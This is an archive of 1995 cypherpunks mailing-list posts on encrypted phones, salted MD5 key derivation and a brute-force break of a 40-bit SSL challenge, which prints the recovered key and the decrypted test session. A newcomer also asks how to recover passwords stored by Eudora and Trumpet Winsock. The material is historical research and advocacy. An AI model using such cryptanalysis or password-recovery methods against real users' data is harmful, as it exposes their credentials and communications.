you choose to sacrifice pain, then there are several options.
 
You can have bone skewers inserted under the muscles in your chest and be
lifted into the air until the skewers tear free (blowing a bone whistle the
whole time).  Or you can have ropes attached to the skewers and the top of
a pole, then you lean back until you break the ropes.  (Again blowing the
whistle.)  Another way is to have Buffalo Skulls attached to the skewers.
You then put the Buffalo skulls on your back and dance until they break
free or tear out of your chest.
 
And all of this is done in the hottest part of the summer. (At a
temperature of about 38C.)
 
> Where do you live now?  How did you evolve from an Indian culture to a
> US-city-bourgeois-like life ?
 
I live about 30Km north of Seattle in a town of 75,000 called Everett.
It's a nice place to live.  Not too much crime except for an occasional
noise complaint.  All things considered, I think it's a nice place to raise
my kid.
 
> > Hobbies : Midieval Warfare (Tactics & Weapons),
> Woops  !
 
Woops?  Is that good or bad?
 
> Sorry I was late in wishing you all the best.  At your age, the world's
> expecting you !
 
Uh oh...   I was hoping to sneak up on it.  #:^)
 
> I won't comment on the maths..  I really hate it, sorry !
 
Most people don't like math...  I guess you have to be a little crazy to
like math.  But I've found that it actually relaxes me.  I sit down and
figure out a new formula, and I feel good that IU was able to do it.
 
> Another cultural "question" : what's a "peptic ulcer"?  I know an ulcer as
> being something very painful on your stomac (I never had it, thanks God..)
 
A peptic ulcer IS a hole in the stomach...  I've had the ulcer since I was
9 years old.  It's like a part of the family now.  So I consider it a
'pet'.  I know it sounds crazy, but if I worry about it, it just hurts
more.  It feels like having a belly full of fire as it is.  I don't need it
hurting any more.
 
> Believe it or not, I've been in Washington once but on business trip for
> the AIIM show  (sorry, AIIM stands for Association for Image and Information
> Management - a "huge" yearly show)...  In fact, these business trips are a
> real scandal fly in/fly out without any time for visiting whatsoever because
> of time (and money) constraints..
 
> Forget these negative words, because I really loved all my US trips
> (but was really mad not to be able to spend at least one week in each
> city/state)  I've been in Boston and Lowell/Mass several times, in
 
My uncle teaches music at Berkley Music College near Boston.  Some of his
works have been berformed by the New York Philharmonic Orchestra, and the
Zurich Philharmonic Orchestra.  I know NOTHING about music though...  I'm a
scientist, not an artist.
 
> Canada once (the Water Falls, straight from Boston and back the same
 
Niagara Falls?
 
> day), Los Angeles(+ one day Disney Land), Florida(+ one day Disney World -
> waw !!), in Chicago and SanFrancisco twice, in NY three times, and of course
> my "see-the-US-in-10-days" tour which involved the Californian Coast
> (Monterrey, Carmel, SeaWorld, LA) + all canyons, Death Valley, Arizona
> Desert, Scottsdale, etc.
 
I went down to California a few years ago to meet some friends.  Haven't
been back though...  :(
 
> When I re-read this, I have no right to complain : I loved it all and
> won't stop coming over...  Next year, I hope to conquer Canada while one
> holiday. (The AIIM show will be in Chicago again in 1996).
 
If you like being in the outdoors, you may want to consider going to Alaska
(Denali National Park) or the Canadian Northwest Territories.
 
> By the way, your US map (on my computer) is a little bubbled..
 
What do you mean 'bubbled'?  It didn't come out right?
 
> But don't worry, I have great maps and books and videos and whatever
> on the States at home. I have even family in the Concorde/Mass. and
> in the Vermont.
 
My girlfriend is originally from Connecticut, and I always tease her about
it.  I tell her that if my friends knew that my girlfriend was a 'damn
yankee', they'd never let me hear the end of it.
 
> all my internet drugs, except when it's football on TV...)
 
Football = Soccer I presume...  Over here 'Football' is a completely
different game.  I used to play it in school when I was about 16 years
old.  (Ever seen/herd of 'The Dallas Cowboys'?)
 
> I'll come back to you soon (we have a four days week-end here as from
> Saturday).
 
Hope you enjoy your weekend.
 
> PS :            Thanks for all info about the net.. Where did you learn
>                 French?  (Escargot..)
 
I don't know French...  I know food.  At 150Kg, I know food...  #:^)
 
 
Hope to hear from you again soon...
 
Paul
ranxerox@ajsbbs.com
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 16 Aug 95 01:48:30 PDT
To: die@die.com
Subject: Re: Purple Boxes
Message-ID: <199508160843.BAA25109@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 8/15/95 -0400, Dave Emery wrote:
>	I reiterate my suggestion of a few months ago that
>one could quite easily adapt the firmware on one of the new simultanious
>data and digital voice on the same phone line modems to incorperate
>encryption, and quite possibly encryption/key exhange interoperable
>with some mode of PGPphone.   Doing this would relieve one of the
>need to develop or manufacture any hardware at all - all that would
>be required to have a portable "bump in the cord" encrypter widely
>available for a low price would be creating a new version of the
>downloadable flash ROM image that did encryption and PGPphone
>key exchange.

Most modems I've seen only have one set of audio interfaces,
and a bump-in-the-cord phone needs two (one for the voice side,
one for the modem line side.)  (Having two jacks doesn't count.)
So you'd need at least two modems, one straight and one re-educated,
and you'd probably need lots more flash ROM than the average modem has.

On the other hand, laptops are increasingly getting multimedia capabilities
like built-in sound cards, and if there's a microphone jack you're in 
business (uh, well, for $3K or so)   Or a cheaper laptop with two PCMCIA modems,
if you can re-educate one, which also lets you move the non-audio parts
of your secure phone program into the PC.  Of course, if you want long
conversations from the airport, you'll still need to find a payphone
within 4-6 feet of an electric socket and not located under a MegaMuzak speaker,
but that's easier than trying to balance a TI Silent 700 under similar
conditions :-)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Wed, 16 Aug 95 03:32:56 PDT
To: perry@piermont.com
Subject: Re: Purple Boxes
In-Reply-To: <199508160341.XAA16498@frankenstein.piermont.com>
Message-ID: <m0sifm2-001eINC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


perry@piermont.com wrote:
> 
> 
> "Dave Emery" writes:
> > 	I reiterate my suggestion of a few months ago that
> > one could quite easily adapt the firmware on one of the new simultanious
> > data and digital voice on the same phone line modems to incorperate
> > encryption, and quite possibly encryption/key exhange interoperable
> > with some mode of PGPphone.
> 
> Does Rockwell sell voice/data modem chipsets?


Do bears crap in the woods? ;-)

My PP14.4 uses a rockwell chipset with caller ID built in.

 


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Wed, 16 Aug 95 03:35:03 PDT
To: monty.harder@famend.com
Subject: Re: An article for Wired magazine
In-Reply-To: <8AF3490.0003000322.uuout@famend.com>
Message-ID: <m0sifns-001eIXC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


MONTY HARDER wrote:
> 
> PE> kilos of gold in it if $50,000 in cash doesn't suit your tastes. I
> PE> defy governments to eliminate gold as well as paper currency.
> 
>   Um. Didn't FDR try that?

Didn't a lot of sheep let him get away with it?



-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 05:15:55 PDT
To: cypherpunks@toad.com
Subject: PGP use in Guatemala?
Message-ID: <199508161214.IAA25845@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear Cypherpunks:

Could someone please send me (hopefully documented) examples of PGP
use and the government reaction to it in Guatemala or point me to
where to find articles (if there are any) on the subject?
Please reply privately to  liberty@gate.net
Thanks.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDHgEm1lp8bpvW01AQHVpwQAhS16CfDaRcqPHNkbanIWGJ1qchjsBoqZ
Or4rxTLNm9LpvMjoiptR8Myo09YaEnYzm38nw4CW4YyMtEVFde99teL0VzSNyYTm
YPL0COTcB6Sw5Ti1w3yjQsKEaMnX1homGRRIFmGpTP9KZfrq/nt193Jw1WySzsMe
zad0RqPCgOM=
=v2J6
-----END PGP SIGNATURE-----
Regards, Jim Ray

Don't investigate Mena, Arkansas and contra-coke. 
Embarrassment is a threat to national security...
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 16 Aug 95 07:58:18 PDT
To: cypherpunks@toad.com
Subject: Re: Use of the IV in DES & stuffing the first block w/ random stuff
In-Reply-To: <SAA03523.199508152240@garotte.va.pubnix.com>
Message-ID: <199508161458.IAA12814@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> >You might want to do something fancy like choose a random salt,
> >use the salt for the IV, and use MD5(salt,human-selected-key) for the key.
> >This makes pre-computation much less useful (unless you're careless
> >and use MD5(key,salt) instead if MD5(salt,key)...), and means that
> >you use a different session key for each batch of stuff you encrypt,
> >even though you're using the same key.  If you're paranoid about replay
> >attacks, you could let some of the bits of the salt be random and some 
> >be a counter, and never accept a key smaller than the one from the
> >previous successfully-decrypted message.
> 
> Hmmmm, so I should put the salt in the clear at the start of the file?
> This looks like an intresting idea.

What I do in Curve Encrypt for the Mac is use the MD5 of the pass phrase,
a 128-bit random salt (overkill is cheap here) and a one-byte counter field
passed repeatedly through MD5, like this:

<bare key> = MD5[<pass phrase>]
<salt> = 128 bits of randoms
<counter> = 0

MD5Init()
for (a tenth of a second)
	MD5Update[<counter><key><salt><key><salt>]
	<counter> = <counter> + 1

<key> = MD5Final()

At startup, the program determines how many iterations of MD5Update can be
accomplished in a tenth of a second on the current CPU, and the loop is run
that many times. The number of iterations and the salt are stored with the
encrypted file, in the clear. The point to the <counter><key><salt><key><salt>
concatenation is that this buffer is 65 bytes long, and MD5 works on 64-bit
blocks, so that the buffer is shifted by one byte in the MD5 block each
iteration, making precomputation of the MD5 addition steps more of a pain.
Also note that the buffer is _not_ repeatedly MD5-hashed, but repeatedly sent
to MD5Update() instead. This is out of fear that there might be fixed-points
in the hash algorithm.


                                    -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Aug 95 06:08:44 PDT
To: cypherpunks@toad.com
Subject: PRZ Wins One
Message-ID: <199508161308.JAA18682@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   PRZ is awarded a 1995 Chrysler Award for Innovation in
   Design, says a $40,000 full-page ad in The NYT today, with
   a brief citation:

      Philip Zimmermann is the designer of Pretty Good Privacy
      (PGP), an E-mail encryption software. Thanks to the
      algorithms of PGP, which was released to the public as
      free software in 1991, E-mail messages can be sent
      securely all over the world without the risk of
      interception by any third party.

   No mention of the free-world leader's sword poised to
   decapitalize the public-spirited designer to protect IC
   hegemony.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Wed, 16 Aug 95 06:46:58 PDT
To: cypherpunks@toad.com
Subject: Zimmermann wins Chrysler Award
Message-ID: <Pine.SUN.3.91.950816090632.24108A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a full-page ad on page A9 of today's Wall Street Journal
announcing the winners of the "1995 Chrysler Award of Innovation in
Design."  One of the six winners is Phil Zimmermann.  I quote:

"Philip Zimmermann is the designer of Pretty Good Privacy (PGP), an
E-mail encryption software.  Thanks to the algorithms of PGP, which
was released to the public as free software in 1991, E-mail messages
can be sent securely all over the world without risk of interception
by any third party."

In case you're interested:

"For the past three years, Chrysler Corporation has been honoring
outstanding designers.  By showcasing great innovations in fields such
as graphic, interactive, product, architectural, and environmental
designs, Chrysler strives to bring well-deserved attention to those
designers whose common attribute is a passionate commitment to their
vision."

Among the other winners: the hip graphic design group Reverb and
"carceral" architect Frank Gehry.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Wed, 16 Aug 95 07:29:42 PDT
To: cypherpunks@toad.com
Subject: Re: Purple Boxes vs. Native Signal Processing
Message-ID: <v02130500ac57a71f4744@[128.101.96.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:58 pm 8/15/95, Timothy C. May wrote:

[snip]
>The trend is away from having two chips when one will suffice. Thus, the
>Macintosh 840av and 660av had a Motorola 68040 _and_ a Motorola 56000 DSP
[snip]
>Pushing DSP functions into the CPU can be taken too far. Apple, for
>example, had/has a "Geo Modem," or something like this, which does modem
>funtions in the CPU of some machines. Last I heard it was stuck at being
>too slow, with no software updates, and effectively is being abandoned.
[snip]

My apologies if this is being too compulsive but for reasons of accuracy it should be pointed out that the DSP in the Mac 660av and also the 840av is the AT&T 3210. The other point I'd make is more a matter of opinion. The Geopod and associated software has been excellent and revisions have just recently been released by Apple and Cypress Research. The phone capability is particularly well designed. This is in marked contrast to the demo program called ApplePhone which was mistakenly treated as an attempt at a finished product when it was just intended as a technology demonstration. It took an unusually long time for MegaPhone, the finished product from Cypress Research, to finally appear. As far as speed is concerned there is impatience about the 14,400 bps limit and that remains the major shortcoming. But even that may be corrected by Apple before too much longer. Personally, I'm more than willing to accept the tradeoff in order to have the tight integration of the three capabilities (data, fax and phone). I still have a funky NuBus card from SuperMac (with three RJ11 connectors and an RS232 connector that was designed to combine these capabilities, it was a prototype) sitting in a drawer while my Quadra and PowerMac are smoothly providing the services. The next step will be to integrate PGPFone with the other three functions so that one could handle data, fax, phone, and secure phone all with the same phone line and without requiring a rocket scientist to set up and use it.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 16 Aug 95 17:39:25 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Object Oriented Crypto API
Message-ID: <8AF4269.000300032B.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


RC> anything without having to know anything about those formats at all.

  Yes. We need to be able to drop in new algorithms, because nobody
knows what new attacks will be developed.

RC> a Universal Resource Name (URN) for key identification. Perhaps
RC> "key://keyserver.domain/keyid" would be better.

  Need to expand the concept of a key just a bit here. Your URL for keys
needs to map to a hierarchy of keys that apply to different facets of a
person's life, (casual vs. sensitive, personal vs. business) as well as
to different encryption engines. The pubkey I have in the keyserver for
the RSA algorithm will not work if you want to use the FOO algorithm
instead.

  Rather than replicating the entire structure of keys for each new
algorithm that comes along, there should be a standard protocol for
requesting these various key types from the same "place".



 * I can't find where to put the milk in my "cereal" port.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Wed, 16 Aug 95 01:42:51 PDT
To: cypherpunks@toad.com
Subject: SSL challenge -- broken !
Message-ID: <9508160842.AA27120@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SSL challenge -- broken

This is to announce the solution of the SSL challenge posted by Hal
Finney on July 17, 1995 (message-ID: <3u6kmg$pm4@jobe.shell.portal.com>),
also found at: <URL:http://www.portal.com/~hfinney/sslchal.html>

The 40-bit secret part of the key is 7e f0 96 1f a6.  I found it by a brute
force search on a network of about 120 workstations and a few parallel
computers at INRIA, Ecole Polytechnique, and ENS.  The key was found after
scanning a little more than half the key space in 8 days.

The cleartext of the encrypted data is as follows:

The SERVER-VERIFY message is:

9C B1 C7 83 D9 BB B7 75 01 6F 19 19 03 58 EC 05     MAC-DATA
05                                                  MSG-SERVER-VERIFY
AF 84 A7 79 F8 13 69 20 25 9B 53 A0 60 AE 75 51     CHALLENGE

The CHALLENGE part is a copy of the challenge sent by the client in its
first message.

The answer is the CLIENT-FINISHED message:

22 BB 23 39 55 B0 7F B6 1A B0 35 85 F7 DB C1 E5     MAC-DATA
03                                                  MSG-CLIENT-FINISHED
BF EB 90 F8 2C 0C E1 EA 18 AC 11 4C 83 14 21 B6     CONNECTION-ID

The next message is SERVER-FINISHED:

D4 CD F3 4E 38 F1 2B 1E DC FD 72 C8 34 02 CD FF     MAC-DATA
06                                                  SERVER-FINISHED-BYTE
23 1C 05 40 60 72 49 6E 83 BA D1 28 CC 9B 5F 63     SESSION-ID-DATA

Then comes the data message sent by the client.  This is the juicy one.
I have broken the contents into its fields (the body was just one long
line)

72 23 B5 98 0D D0 07 1A DA F1 C7 A4 40 41 5A 10     MAC-DATA
POST /order2.cgi HTTP/1.0
Referer: https://order.netscape.com/order2.cgi
User-Agent: Mozilla/1.1N (Macintosh; I; PPC)
Accept: */*
Accept: image/gif
Accept: image/x-xbitmap
Accept: image/jpeg
Content-type: application/x-www-form-urlencoded
Content-length: 472

source-form=order2-cust.html&
order_number=31770&
prod_80-01020-00_Mac=1&
carrier_code=UM&
ship_first=Cosmic&
ship_last=Kumquat&
ship_org=SSL+Trusters+Inc.&
ship_addr1=1234+Squeamish+Ossifrage+Road&
ship_addr2=&
ship_city=Anywhere&
ship_state=NY&
ship_zip=12345&
ship_country=USA&
ship_phone=&
ship_fax=&
ship_email=&
bill_first=&
bill_last=&
bill_org=&
bill_addr1=&
bill_addr2=&
bill_city=&
bill_state=&
bill_zip=&
bill_country=USA&
bill_phone=&
bill_fax=&
bill_email=&
submit=+Submit+Customer+Data+

This order came from Mr Cosmic Kumquat, SSL Trusters Inc.,
1234 Squeamish Ossifrage Road, Anywhere, NY 12345 (USA).

Unfortunately, Mr Kumquat forgot to give his phone number, and the
server's reply (in two packets) is:

09 12 AD FE A5 A9 BF D1 8C 8C E2 6A A3 48 B9 75    MAC-DATA
HTTP/1.0 200 OK
Server: Netscape-Commerce/1.1
Date: Wednesday, 12-Jul-95 05:40:30 GMT
Content-type: text/html

1C CD C4 3D 80 F1 7B 94 11 AC E8 72 B1 99 BC FA    MAC-DATA
<TITLE>Error</TITLE><H1>Error</H1>
The shipping address you supplied is not complete.  The street address,
city, state, zip code, country and phone number are mandatory fields.
Please go back and specify the full shipping address.  Thank you.


This result was found with a quick-and-dirty distributed search program,
which I wrote when I realized that the cypherpunks were going to be a few
weeks late with their collective effort.  When the program was running,
it took little more than one week to find the key (it would have taken about
15 days to sweep the entire key space).  I ran it on almost all the machines
I have access to, summarized in the following table:

type                  speed (keys/s)    number     notes
- --------------------------------------------------------
DEC (alpha)           18000-33000        34
DEC (MIPS)            2500-7500          11
SPARC                 2000-13000         57
HP (HPPA/snake)       15000              3
Sony (R3000)          1100-4000          3
Sun 3                 600                2
Sequent B8000         100 x 10           1         (1)
Multimax (NS532)      600 x 14           1         (1)
KSR                   3200 x 64          1         (1) (2)

Notes:
1.  These are multiprocessor machines
2.  The KSR spent only about 2 days on this computation.

The total average searching speed was about 850000 keys/s,
with a maximum of 1350000 keys/s (1150000 without the KSR).


Conclusions:

* Many people have access to the amount of computing power that I used.
  The exportable SSL protocol is supposed to be weak enough to be
  easily broken by governments, yet strong enough to resist the attempts
  of amateurs.  It fails on the second count.  Don't trust your credit
  card number to this protocol.

* Cypherpunks write code, all right, but they shouldn't forget to run it.


I want to thank the people at INRIA, Ecole Polytechnique, and Ecole
Normale Superieure for giving their CPU time.  (Most of them are on
vacation anyway...)


You can find a copy of this text at
<URL:http://pauillac.inria.fr/~doligez/ssl/announce.txt>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCSAwUBMDG4dVNZwSQVabihAQGeFAPnUZil4WlauoMke9HaULDNOVf1hLXS0i9U
VJWZsPHcihDbn6nBN9T6f3sW/S08N5YJFSCmuZzqO59c0nOAKILb6a3TsXjFEcu8
W8UfwFsZa6gx7iuYqandhoHBEkkc5NSwMe1f+lPiV2MdclzQ4/VtZ7Oa1VB+RftD
Am4+w/Y=
=Fju1
-----END PGP SIGNATURE-----

**** This is a timestamp of the above message:

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

iQBVAwUAMDGsOeWrvYiumrHZAQF0QwIAnDWdVVTiVmUTY5lp08yPeLRoFetczb+U
E0WVgTUJ4a16tinOPaJl/6jOpPUUPWMjkDaD2N1xw8lGqm0UgZJiGIkAkgMFATAx
uKJTWcEkFWm4oQEBAQ8D5ixvYrpEAQYfeNXmbB46BTTnBwBPS/JjfVFEEnC0Zsoj
cyh/WELUsZf785b23vEq9JFvZB+bq1UsJTpttl335TrW344ZYof3kl6fdEF2Jf5q
LxQjkuP9s/OQX5iJZpHz4LUxbb+/hOwSdZ2O3LV7ETiHs9AK1+bnKfOGDyei
=qO7V
-----END PGP MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 16 Aug 95 10:46:13 PDT
To: cypherpunks@toad.com
Subject: Re:  SSL challenge -- broken !
Message-ID: <199508161745.KAA08481@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Damien.Doligez@inria.fr (Damien Doligez)
> This is to announce the solution of the SSL challenge posted by Hal
> Finney on July 17, 1995 (message-ID: <3u6kmg$pm4@jobe.shell.portal.com>),
> also found at: <URL:http://www.portal.com/~hfinney/sslchal.html>

Although it is hardly necessary, I can confirm the accuracy of the
decryption found, and I extend my congratulations for this achievement!

Ironically, I understand that an independent effort coordinated by Adam
Back also discovered the key at approximately the same time.  In
addition, Eric Young had done a search starting at 8000000000 and
upwards; unfortunately the key value of 7ef0961fa6 was only about one
percent below his starting point.  Hopefully Adam will supply more
information.

It will be interesting to see what the fallout is from this
accomplishment.  It should provide ammunition for the current effort by
Microsoft and other companies to try to persuade the government to allow
the export of full 56 bit DES.

Knowing the tendency of the media and the net to oversimplify, this will
probably come out as "SSL is broken" just as the RSA-129 result led to
"RSA is broken" stories.  This would not be as egregious an
oversimplification as in the RSA case, but in fairness it should be
recognized that SSL as a spec provides support for much stronger ciphers
than the intentionally weakened RC4-40 which was broken here, but
Netscape was constrained by the government to supply browsers with only
the weak encryption.

I am a little alarmed by the suggestion that this news could have some
marked impact on the Netscape stock price.  From our perspective this was
certainly an unsurprising result (not to take anything away from Damien
and others who worked on it).  It is a useful reminder that the things we
work on here can have profound consequences.

Hal Finney
hfinney@shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMDIuehnMLJtOy9MBAQHQbwH+I0YL1ewcCbXOGw8yYvKXIJMg15O0jmqW
wMb6SKrethbJzpWXJBpC1oKrl8wVzPvqBCLJtfJFWcN9xD4pTOluhA==
=0GPy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 16 Aug 95 11:07:10 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161745.KAA08481@jobe.shell.portal.com>
Message-ID: <199508161806.LAA29214@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Hal <hfinney@shell.portal.com> writes:
> I am a little alarmed by the suggestion that this news could have some
> marked impact on the Netscape stock price.  From our perspective this was
> certainly an unsurprising result (not to take anything away from Damien

So far it appears not to have had an effect.  The two web pages I know about
that track Netscape show it holding steady a point and a half above where it
opened.  Even the IF market on SSLW doesn't seem to be taking much notice of
it, despite my attempts at manipulating that market.

	Jim Gillogly
	Mersday, 24 Wedmath S.R. 1995, 18:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Wed, 16 Aug 95 09:14:48 PDT
To: cypherpunks@toad.com
Subject: Eudora/Trumpet encryption
Message-ID: <Pine.SOL.3.91.950816110927.4127G-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


I'm a crypto newbie here, but does anybody know how Trumpet Winsock 
and/or Eudora encrypt the passwords in their .ini files?  I am trying to 
write a front end for a client and would rather it set up automatically 
rather than the program ask.

How would I go about cryptoanalysing this?  If it were a simple XOR, then 
wouldn't Plaintext1^Cypher1 == Plaintext2^Cypher2 and so on?

Thanx for any help you can give me on this matter,

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Wed, 16 Aug 95 11:24:39 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161806.LAA29214@mycroft.rand.org>
Message-ID: <Pine.3.89.9508161127.A13461-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Even more to the point is my claim on IF about brute forcing
a 40 bit cipher "Cr40".

	-Lance

On Wed, 16 Aug 1995, Jim Gillogly wrote:

> 
> > Hal <hfinney@shell.portal.com> writes:
> > I am a little alarmed by the suggestion that this news could have some
> > marked impact on the Netscape stock price.  From our perspective this was
> > certainly an unsurprising result (not to take anything away from Damien
> 
> So far it appears not to have had an effect.  The two web pages I know about
> that track Netscape show it holding steady a point and a half above where it
> opened.  Even the IF market on SSLW doesn't seem to be taking much notice of
> it, despite my attempts at manipulating that market.
> 
> 	Jim Gillogly
> 	Mersday, 24 Wedmath S.R. 1995, 18:06
> 

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Aug 95 08:26:45 PDT
To: cypherpunks@toad.com
Subject: BUY_lou
Message-ID: <199508161526.LAA06595@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-16-95. NYPaper:


   "The F.B.I. and Ruby Ridge." [Editorial]

      Since the paranoid days of J. Edgar Hoover, the F.B.I.
      has been struggling to free itself of an institutional
      incapacity to admit its mistakes and punish wrongdoing
      by senior officials. Mr. Freeh, who was entrusted with
      this task, seems to have put misplaced confidence in a
      longtime friend and associate. Mr. Freeh is said to be
      infuriated that his trust was abused. Well he should be
      furious -- especially at himself.


   "Separatist Family Given $3.1 Million From Government."

      The Government agreed today to pay $3.1 million to the
      family of a white separatist whose wife and teen-age son
      were killed three years ago by Federal agents in a
      standoff on a remote Idaho mountainside. The decision to
      give Mr. Weaver and his children any money was
      particularly stunning, since Federal prosecutors tried
      two years ago to have him convicted in the killing of a
      Federal marshal at Ruby Ridge, and sought the death
      penalty. Federal investigators involved in the case were
      rebuked by the judge who presided over the trial. The
      case has also taken on political dimensions. Some
      conservative groups have cited the shootout, along with
      the 1993 F.B.I. assault on the Branch Davidian compound
      near Waco, Tex., as examples of Government abuse of
      power.


   BUY_lou











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Wed, 16 Aug 95 09:30:14 PDT
To: cypherpunks@toad.com
Subject: DSP's, Purple Boxes, Etc...
Message-ID: <Pine.LNX.3.91.950816112614.14429A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain



For those interested in design of these purple boxes, etc., you might 
want to check out a couple of magazines that are FULL of advertisements 
and specs on DSP's, CPU's, communications design equipment, etc:

Data Communications
(800) 525-5003

and

Computer Design
Circulation Director (918) 832-9287 email paulw@pennwell.com

Both magazines are free.

Alan Patterson (lep@wsnet.com)       PGP public key available at MIT keyserver.
WSNetwork Communications Services, Inc. Fngpt: 41D0F61B496FECC09FABECF686AB2AIC
Montgomery, Alabama (334) 263-5505 (800) INET-750 PGP Encrypted Email Preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Wed, 16 Aug 95 11:32:41 PDT
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
In-Reply-To: <199508161654.MAA25878@access5.digex.net>
Message-ID: <199508161832.LAA28361@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
> I don't think that there is any serious worry for Netscape. Their
> security is fine-- it's just crippled by the US Government. They
> could probably start distributing binary versions of their software
> that used full 128 bit keys in several hours. It's just that the
> Government gets pissed off about these things.
> 

I have to agree, Netscape may spend some energy to upgrade their 
encryption, but it really won't buy them all that much.   SSL, to me, is 
like using a "security envelope" to mail cash or putting the club on your 
car.  It presents just enough of an obstacle to keep honest people honest.

jweis@primenet.com
http://www.qtime.com/~jweis



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 16 Aug 95 08:44:51 PDT
To: John Young <jya@pipeline.com>
Subject: Re: BUY_lou
